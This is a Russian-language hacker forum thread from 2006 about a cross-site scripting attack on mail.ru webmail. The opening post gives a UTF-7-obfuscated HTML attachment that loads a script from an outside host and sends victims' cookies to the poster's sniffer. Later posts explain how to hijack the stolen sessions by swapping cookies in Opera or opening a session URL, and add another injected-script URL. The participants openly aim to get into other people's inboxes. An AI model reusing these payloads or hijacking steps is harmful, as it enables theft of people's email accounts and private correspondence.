XSS на mail.ru

Discussion in 'Уязвимости Mail-сервисов' started by Actu@l SpY, 6 Oct 2006.

  1. Actu@l SpY

    Actu@l SpY Member

    Joined:
    5 Jun 2006
    Messages:
    20
    Likes Received:
    23
    Reputations:
    24
    Взлом Майл.ру
    жертва должна будет скачать и открыть прикреплённый файл в хтмл формате

    <html>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-7">
    <TABLE><TD BACKGROUND="+ACYAIw-106+ACYAIw-97+ACYAIw-118+ACYAIw-97+ACYAIw-115+ACYAIw-99+ACYAIw-114+ACYAIw-105+ACYAIw-112+ACYAIw-116: document.write('+ACYAIw-60+ACYAIw-115+ACYAIw-99+ACYAIw-114+ACYAIw-105+ACYAIw-112+ACYAIw-116 SRC=http://devarsiv.org/alex/j.js> </SCRIPT>')">
    </html>

    куки придут на мой сниффер
    вы можете воспользоваться ими по адресу:www.devarsiv.org/alex/alex.php

    сейчас сделаю видео !

    удачи!
     
    #1 Actu@l SpY, 6 Oct 2006
    Last edited: 7 Oct 2006
    6 people like this.
  2. SladerNon

    SladerNon Адам

    Joined:
    6 Mar 2005
    Messages:
    1,636
    Likes Received:
    938
    Reputations:
    355
    Actu@l SpY

    Круто нафиг! :). Давай видео !!! )
     
  3. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    Отлично!
     
  4. Koller

    Koller Elder - Старейшина

    Joined:
    25 Jul 2005
    Messages:
    402
    Likes Received:
    246
    Reputations:
    302
    Сделав как описанно выше на сниффер пришло следующее:

    "REFERER=http://win.mail.ru/cgi-bin/readmsg/1.html?id=11601349480000001767;0;1&mode=attachment&channel=¬ype"

    Что-то не так делаю или что?
    Ведь сессии самой то нет...
     
  5. -Concord-

    -Concord- Elder - Старейшина

    Joined:
    16 Jun 2006
    Messages:
    158
    Likes Received:
    191
    Reputations:
    68
    Если сработает то будет круто.... а сниф может не сработать? иногда бывает что приходит пустые логи..
     
  6. Koller

    Koller Elder - Старейшина

    Joined:
    25 Jul 2005
    Messages:
    402
    Likes Received:
    246
    Reputations:
    302
    Если я ничего не путаю, то я вижу следующее:
    Примеры, которые привел Actu@l SpY не будут работать хотя бы по той причине, что пути такого как "http://win.mail.ru/session/......" нет уже...в данный момент "http://win.mail.ru/cgi-bin/..."
    Сессию сниффер никак не может утянуть...
    По крайней мере у меня не получилось, хотел делал точно все так, как описано выше...
    Может подскажите в чем моя ошибка?
     
    #6 Koller, 7 Oct 2006
    Last edited: 7 Oct 2006
  7. Actu@l SpY

    Actu@l SpY Member

    Joined:
    5 Jun 2006
    Messages:
    20
    Likes Received:
    23
    Reputations:
    24
    до того момента как я выложил багу на форуме всё работало,
    буквально через 30 минут,эту багу прикрыли ,остался только вариант через мой сниффер и то по непонятным причинам попасть в инбокс через оперу по свежим кукам стало проблематично
     
  8. Actu@l SpY

    Actu@l SpY Member

    Joined:
    5 Jun 2006
    Messages:
    20
    Likes Received:
    23
    Reputations:
    24
    nc.STRIEM подтвердит, что сегодня он побывал у меня-же в инбоксе,приведённым мной вариантом,,а через пол чеса облом, багу видимо прикрыли,но всё-же подменив куки в опере мы попадем в инбокс,на то время пока жертва будет в он-лине
     
    #8 Actu@l SpY, 7 Oct 2006
    Last edited: 7 Oct 2006
    1 person likes this.
  9. SladerNon

    SladerNon Адам

    Joined:
    6 Mar 2005
    Messages:
    1,636
    Likes Received:
    938
    Reputations:
    355
    Actu@l SpY

    Ну это для нас давно не секрет, что люди с mail.ru тоже тут тусуються, потому как бы стараемся что-то свеженькое и горячее переносить в закрытую зону.

    P.S. В этот раз меня терзали смутные сомнения, убрать ли тему выше или оставить тут. Оставил ). Результат на лицо :)
     
  10. Bayazid

    Bayazid Banned

    Joined:
    26 Nov 2005
    Messages:
    141
    Likes Received:
    24
    Reputations:
    -2
    Круто чувак.Ждем видео.
     
  11. Actu@l SpY

    Actu@l SpY Member

    Joined:
    5 Jun 2006
    Messages:
    20
    Likes Received:
    23
    Reputations:
    24
    видео отправил но ещё не опубликовали ,может и-за не очень хорошего качества
     
    1 person likes this.
  12. SladerNon

    SladerNon Адам

    Joined:
    6 Mar 2005
    Messages:
    1,636
    Likes Received:
    938
    Reputations:
    355
    Actu@l SpY

    Попробуй ищё раз отправить. Видео не дошло.
     
  13. nc.STRIEM

    nc.STRIEM Members of Antichat

    Joined:
    5 Apr 2006
    Messages:
    1,036
    Likes Received:
    347
    Reputations:
    292
    ЭТУ XSS не прикрыли!
    прост чеб она выполнилась недостаточно открыть письмо!
    Отсылаеться она так: сохраняеться в html файл, после чего файл прикрепляеться к письму! потом при прочтение письма жертва должна нажать "скачать" прикрепленный файл, и в появившемся окошке нажать кнопку открыть! собсно вот так))) тогда срабатывает, и куки уплывают.......
     
    1 person likes this.
  14. Lany

    Lany New Member

    Joined:
    13 Sep 2006
    Messages:
    9
    Likes Received:
    4
    Reputations:
    0
    Классно, а от браузера жертвы результат не зависит?
     
  15. Actu@l SpY

    Actu@l SpY Member

    Joined:
    5 Jun 2006
    Messages:
    20
    Likes Received:
    23
    Reputations:
    24
    на мaйл.ру вопше по себе ху* знает какие у них там глиуки на сервере ,вчера вечером сниффер перестал выдёргивать сессию ,сегодня сессия и куки выдёргиваетса нормально.

    когда на сниффер приходит куки и путь к ящику: http://win.mail.ru/cgi-bin/
    то надо менять cookie в опере
    в каждый параметр вставляете своё значение например так:
    заходите к себе на емаил через оперу дальше в инструменты,настройки,куки ,управление cookies ,виде-те @майл.ру кликнете на логотип открывается табло с куками:
    c8: 71gpRQAAAAD1LAEAAAAAARAQAAAAABGR0BAAAAAAD7iAEAA
    Mpop:1160300756:4d50560750005024f6a5d5e465e0404090c1d010c00184958520c44115c565c5b1b4341:[email protected]:
    Mpopl:63920967
    mrcu:FDD24528E35C2CFCD118A66742
    p:g20EAEr/eAA
    t:bLD1AAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAABAAAAAAAABgMpgcA
    теперь меняете каждый параметр на то,что утянул сниффер
    вход:http://win.mail.ru/cgi-bin/start

    утенулась сессия то куки подменивать в Опере не нужно,на тот момент пока жертва в онлайне читает письмо вы входите так : http://win.mail.ru/session/5a0f5b647243746f19050219091d011b0007014f6a5d5e465e0704091b02747b1f5c504350555842105b5c44411f4642/start
    остальное вот это:/readmsg/document.html?id=11603102580000017668;0;1&mode=attachment&channel=&notype удаляете

    если не разберётесь стучите ,всем удачи
     
    #15 Actu@l SpY, 8 Oct 2006
    Last edited: 8 Oct 2006
  16. Nowi4ok

    Nowi4ok Banned

    Joined:
    13 Dec 2005
    Messages:
    27
    Likes Received:
    0
    Reputations:
    -7
    rabotaet respekt
     
  17. Actu@l SpY

    Actu@l SpY Member

    Joined:
    5 Jun 2006
    Messages:
    20
    Likes Received:
    23
    Reputations:
    24
    выше приведённый мной вариант срабатывает и на Рамблер.ру
    ещё нашёл вариант : http://win.mail.ru/cgi-bin/sendmsg?plainmode=1&Body="><SCRIPT SRC=http://devarsiv.org/alex/j.js></SCRIPT>
    но ругается на потенциальный опасный код в письме ,тoесть в прикреплённом хтмл файле
    вот сам ксс на майле.ру :win.mail.ru/cgi-bin/sendmsg?plainmode=1&Body=<script>alert('XSS')</script>
     
    #17 Actu@l SpY, 9 Oct 2006
    Last edited: 9 Oct 2006
    1 person likes this.
  18. nc.STRIEM

    nc.STRIEM Members of Antichat

    Joined:
    5 Apr 2006
    Messages:
    1,036
    Likes Received:
    347
    Reputations:
    292
    У мя не пашет! не уверен че она работает или работала в ближайшее время)))
     
  19. Actu@l SpY

    Actu@l SpY Member

    Joined:
    5 Jun 2006
    Messages:
    20
    Likes Received:
    23
    Reputations:
    24
    вчера алерт выскакивал 100% отвечаю, сегодня голяк
    в паб-лик больше скидывайте баги ..короче
     
  20. Lany

    Lany New Member

    Joined:
    13 Sep 2006
    Messages:
    9
    Likes Received:
    4
    Reputations:
    0
    круто !!!!!!!! Только нужно умудрится заставить жертву скачать файл